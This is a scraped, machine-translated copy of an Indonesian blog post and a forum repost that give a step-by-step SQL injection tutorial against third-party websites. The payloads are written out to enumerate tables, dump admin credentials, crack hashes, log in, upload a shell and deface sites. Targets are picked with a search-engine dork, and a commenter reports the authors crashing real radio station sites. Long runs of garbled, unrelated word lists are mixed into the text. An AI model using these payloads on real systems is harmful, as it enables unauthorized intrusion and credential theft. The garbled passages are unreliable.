if but will step-by-step sql injection sql injection hack hack how easy admin

8/9/2019 If but Will Step-By-step SQL Injection SQL Injection Hack Hack How Easy Admin

1/29

My Step by Step SQL Injection

Posted by Admin on February 15, 2009 - 6:00 pm


2/29

SOLIKIN LEADER

Filed under WOW

Understanding sql injection:

SQL injection is a hacking action performed on the client application by modifying an existing SQL

statement in memory clien application and also the technique of exploiting web applications that use a

database for storing therein data.

That need to be in the know before the mysql sql injection:

character: 'or


3/29

EAT DRINK Wardi colorful

AGUS Lilik Silvi Tito

MARRIED EAT DRINK

together SARIMANcomments: / * or -information_schema to version: mysql 5.x version, no support for mysql version 4.x

===========

= Step A: =

===========

find the target

eg: [site] / berita.php? id = 100

Add the characters' at the end of the url or add the character "-" to see if there is an error message.

example: [site] / berita.php? id = 100 'or

[Site] / berita.php? Id =- 100

so the error message appears as follows (still bnyak again):


4/29

SOLIKIN SARIMAN BIN

BIN BIN colorful WardiYanti SULASHADI

SARIMAN colorful BIN

WASTE WATER EAT


5/29

DRINK LARGE COMMON

HOUSEHOLD Maid

10000000000000000000

00000 EAT DRINK GLASSPLATE SOLIKIN ENDANG

HAVID Haris GROSS BIN

ABDULLAH SARIMAN

Wardi Harjono Efendi

Maid HAVE ONCE aftermating repeated over and


6/29


7/29

DRINK Silvi AGUS ANDI

Anin NUNUS BIN Wardi

SARIMAN EAT DRINK

defecate AGUS Lilik BINBIN SARIMAN Wardi

100000000000000000

AGUS Silvi PLATE GLASS

Yanti DIAS SUSKANDANI

BIN Wardi many TIMESMARRIED


8/29

==========

= Step two: =

==========

find and count the number of tables that exist in the database ...

use the command: order by

example: [site] / berita.php? id =- 100 order by 1 - or

[Site] / berita.php? Id =- 100 order by 1 / *

check the every step (satupersatu) ...

eg: [site] / berita.php? id =- 100 order by 1 -

[Site] / berita.php? Id =- 100 orders by 2 -



so that it appears an error or missing error messages ...

eg: [site] / berita.php? id =- 100 orders by 9 -

means that we take is up to 8 digits

a [site] / berita.php? id =- 100 orders by 8 -

===========

= Step three: =

===========


9/29

to figure out how much appear to use union command

because of this error until the number 9

then: [site] / berita.php? id =- 100 union select 1,2,3,4,5,6,7,8 -

ok like a who out number 5

use the version command () or @ @ version to check version of sql command input diapakai who TSB

who went out last nagka

eg: [site] / berita.php? id =- 100 union select 1,2,3,4, version (), 6,7,8 - or

[Site] / berita.php? Id =- 100 union select 1,2,3,4, @ @ version, 6,7,8 -


10/29

SOLIKIN SARIMAN BIN

BIN BIN colorful Wardi

Yanti SULASHADI

SARIMAN colorful BINWASTE WATER EAT

DRINK LARGE COMMON

HOUSEHOLD Maid

10000000000000000000



11/29


ABDULLAH SARIMAN



over and over ONCE

MARRIED SOLIKIN Haris

DIAS HAVID Widi Yanti

Tito BIN Wardi adit withcolorful colorful EAT


12/29

DRINK Wardi Maid

charged with duty COOK

ROOM CLEANING PLATE

WASHING CLOTHESWASHING SLEEP EAT



SARIMAN EAT DRINK



13/29

100000000000000000




see who is used like a version of version 4's leave because in this ver 4 we have to guess their own table

column n imaginable on the Web because they can not use the command From Information_schema ..

to version 5 then you are lucky to not have to guess the n column table like ver ver 5 4 because it can

use the command From Information_schema ..

============

= Step Four: =

============


14/29


15/29

DRINK LARGE COMMON

HOUSEHOLD Maid

10000000000000000000



ABDULLAH SARIMAN




16/29

over and over ONCE

MARRIED SOLIKIN Haris

DIAS HAVID Widi Yanti

Tito BIN Wardi adit withcolorful colorful EAT

DRINK Wardi Maid

charged with duty COOK

ROOM CLEANING PLATE

WASHING CLOTHESWASHING SLEEP EAT


17/29



SARIMAN EAT DRINK


100000000000000000





18/29

to display the existing tables in the web address is

table_name command>>> included in the numbers who went out last

command from information_schema.tables / *>>> inserted after the last digit

[Site] / berita.php? Id =- 100 union select 1,2,3,4, table_name, 6,7,8 from information_schema.tables-

like a table that appears is "admin"

===========

= Step Five: =

===========

to display all the contents of the table address is

group_concat command (table_name)>>> included in the numbers who went out last


19/29

command from Nowhere information_schema.tables table_schema = database ()>>> inserted after the

last digit

[Site] / berita.php? Id =- 100 union select 1,2,3,4, group_concat (table_name), 6,7,8 from Nowhere

information_schema.tables table_schema = database () -

=============

= Step Six: =

=============

group_concat command (column_name)>>> included in the numbers who went out last

Nowhere information_schema.columns orders from table_name = 0xhexa->>> inserted after the last

digit

[Site] / berita.php? Id =- 100 union select 1,2,3,4, group_concat (column_name), 6,7,8 from

information_schema.columns table_name = 0xhexa-Nowhere

mandatory at this stage you mengextrak words on a hexadecimal table content that is by converting it

who used the website for conversions:

www.ascii-convert.co.cc

example in the covetous said conversion ie it will be 61646D696E admin

[Site] / berita.php? Id =- 100 union select 1,2,3,4, group_concat (column_name), 6,7,8 from Nowhere

information_schema.columns table_name = 0 61646D696E-


20/29

============

= Step-Seven: =

============

led to what had been excluded from the table that is by

concat_ws command (0 3a, the contents of the column who want removed)>>> included in the

numbers who went out last

order from (the name derived table)>>> inserted after the last digit

[Site] / berita.php? Id =- 100 union select 1,2,3,4, concat_ws ( 3a 0, the contents of column), 6,7,8 from

(table name derived) -

examples of words that come out are id, username, password

[Site] / berita.php? Id =- 100 union select 1,2,3,4, concat_ws (0 3a, id, username, password), 6,7,8 from

admin-

==============

= Step-Eight: =

==============

last stage of looking for the page admin or login

The next is up to you because there is a web of power in your hands ...

For More Clearly Can Download Video Tutorial This File With MySQL Injection


21/29

DOWNLOAD

Direct your run file "Injection.html SQL"

(Nb. apologize if there is one word or deficiencies in this video tutorial)

Greeting

Gonzhack

Comments RSS Feed Trackback URL Post a comment Share on Twitter Share on Facebook

13 Comments

1.

LinKL says:

March 29, 2009 at 4:03 pm

On the website my goal ..

Ga there recordID = ....

of disposable

cat 21:22

cat 22:23


22/29

was how mas?

2.

Andyra says:

May 7, 2009 at 6:31 pm

om .. why I can not in step 3 yes

whereas step 1 ma 2 can but how can a three-_-y

om said in step 3 would be in the numbers ni?? Indeed figures out that important

Tw jangan2 ntu tu om hehehe toggle rate

om joke ...

Plis dong om .. kluenya again ..

3.

Patara says:

May 16, 2009 at 10:29 pm

Hi guys,

You managed to crash A Few radio stations in the UK on Friday and have very kindly pointed out how

you did it via this blog. Strangly Enough Now I am not upset, Because They are not mine!

However what it is That shows me you are very good and breaking through the UK what techies think

is a safe website. I therefore would like to employ you in a consultancy capacity to let me know how safe

certain sites develope As We Are Them. By this I mean That you are to charge me a consultancy fee persite to let me know the weak points in any site That I send to you - however a NOT to crash it:)

I understand if you are cautious about Standard and Poor's approach, but want to leave you with a

thought: You guys are very smart - much smarter than my techies in the UK - Who Will be up and

running again at Some point, however I would like to put the knowledge you have to good use and I

always pay Someone WHO teaches me something. When I was younger I studied Martial Arts and was

taught That if Someone punches you in the face, it is Because you have a weak gaurd, so you Should


23/29

respect That Can anyone get your through guard and not make excuses for your own Weakness (in

letting the punches get through) well your punches got through and you have my respect:)

Hence I am willing to pay you to teach me how to stop getting passed our gaurd Others.

Regards

Patara

4.

Gardening says:

June 13, 2009 at 1:56 pm

Hello Guru, what entice you to post an article. This article was extremely interesting, ESPECIALLY

since I was searching for thoughts on this subject last Thursday.

5.

Denny Garden says:

June 13, 2009 at 4:37 pm

Such a usefule blog? Wow!!

6.

Lidia says:

June 26, 2009 at 3:17 pm

Mas, had long since learned to hack really want to, not purposely to see this website. Googling my

own again hence the problem of mysql injection nyantron here. That's really great video, dial-up

connection lemot internetku really, is there a smaller version of the pdf? Then there's a tutorial on

writing that is lost or accidentally dilengkapin not ya? please can not ask for the full article? Thanks loh!

7. share] step by step SQL injection just for the learning course

Solutions Forum - Bring news and applicationz FOR YOU:: Computer Stuff:: Networking, Programming &

Scripts:: Hacking


24/29

Page 1 of 1 Share Actions!

Actions!

View posts since last visit

View your posts

View unanswered posts

Topic being watched

Send to a friend

Copy the URL BBCode

Print this page

View previous topic View next topic Go down

*

*

*

*

*

*

*

[Share] step by step SQL injection just for the learning course


25/29

Post Admin on Thu January 16, 2010 5:14 pm

[Share] step by step SQL injection just for the learning course

since here there is thread "hacking hacking trick-Share is ngetrend" in addition to strengthening my

memory, I am very forgetful soale Wink)? / S7;

I'll share my knowledge this is only a little about how to conduct SQL injection on the web ... (remember

only for learning just ea ... Very Happy)

ga ato useful if too vulgar in del aja .. (Dueh unnoticed if ane ordinary vulgar Very Happy)

Before talking about SQL injection, first I'll explain what it is sql injection and how that could happen.

Actually SQL injection occurs when an attacker can insert some SQL statements to 'query' by

manipulating data input into the application TSB. Among DB formats such as PHP + MySQL and ASP +

MSACCESS or with MySql, here I'm just going to discuss about sql injection in the url only.

sob immediately wrote ...

1. looking at the first target with a dork mbah google "inurl: index.php? id =" (other dork can nyari on

google, many bgt koq)

2. suppose that already get the target http://www.korban.com/index.php?id=1

Add a single quote character "'" (without quotation marks) at the end of url

or add the character "-" to see if there is vuln.

so the url becomes http://www.korban.com/index.php?id=1 '

if there are errors on web pages means that Erb vuln if not search for other targets ...

3. locate and count the number of tables that exist in databasenya.gunakan command: + order + by +

numbers

so that it becomes http://www.korban.com/index.php?id=1+order+by+1-- url

now checks one by one until no longer find the error:

http://www.korban.com/index.php?id=1+order+by+1--


26/29




http://www.korban.com/index.php?id=1+order+by+4-- was not suppose to find the error again.

mean that we take is to figure 3

4. to figure out how much appear to use union command

because of this error until the number 3

then:

http://www.korban.com/index.php?id=1+union+select+1 ,2,3 -

5. figure out who suppose 2 use the command version () to check the version of sql command input

diapakai who TSB who went out last nagka

example:

http://www.korban.com/index.php?id=1+union+select+1, version () .3 -

who see the version used, if left alone version 4 because in this ver 4 we have to guess their own table

column n imaginable on the Web because they can not use the command from + information_schema

to version 5 then you are lucky to not have to guess the n column table like ver 4 because in ver 5 can

use the commands from + information_schema. continue ...

6. To display all the contents of the table address is group_concat command (table_name) -> included in

the numbers who went out last

command + from + information_schema.tables + Nowhere + table_schema = database () - -> inserted

after the last digit

so the url becomes http://www.korban.com/index.php?id=1+union+select+1, group_concat

(table_name), 3, + from + information_schema.tables + Nowhere + table_schema = database () -


27/29

7. suppose you have found the table that kira2 memnuat username + password is the table of "admin"

to change the admin table to hexadecimal form Dolo (can make here: http://www.string-

functions.com/string-hex.aspx)

8.masukkan group_concat command (column_name) -> included in the numbers who went out last

enter command + from + information_schema.columns + Nowhere + table_name = 61646d696e - ->

inserted after the last digit, 61646d696e is the word admin in the form of a hex

so the url becomes http://www.korban.com/index.php?id=1+union+select+1, group_concat

(column_name), 3 + from + information_schema.columns + Nowhere + table_name = 0x61646d696e -

9. Led to what had been excluded from the table that is by

group_concat command (0x3a, the contents of the column who want removed) -> included in the

numbers who went out last

command + from + (the name derived table) -> inserted after the last digit

example: the word that comes out is adminID, Name, password

thus becomes

http://www.korban.com/index.php?id=1+union+select+1, group_concat (adminID, 0x3a, Name, 0x3a,

password), 3 + from + admin -

10. 've met tuh username password na ma ... na tuh stay dencrypt pass. if the form could be on crack

md5 here http://www.md5decrypter.co.uk/

11. search login page Admin -> Login as admin -> Search fitur2 uploaded files or images -> then upload

your shell -> then whatever you want diapain tu web Very Happy. can be hell if directly PM tu web

admin who'll soon have the patch (na e-mail can also search the table yesteryear), Jagan in eah coz

deface web make it hard to sob ...

12. cape dee huft writing that much ..., del aja ga if useful ....


28/29

thx for the predecessors who have given science a cuma2 make ane ... Very Happy

Admin

Webmasters

Webmasters

Number of posts: 60

Age: 24

Location: Bandung

points: 89

Reputation: 0

Registration date: 2008-09-12

http://speechyourm1nd.blogspot.com/

Back to top Go down

*

*

*

*

*

*

*


29/29

Re: [share] step by step SQL injection just for the learning course

Post engkoh on Fri January 31, 2010 4:52 pm

nice info gan ..

engkoh

if but will step-by-step sql injection sql injection hack hack how easy admin

Documents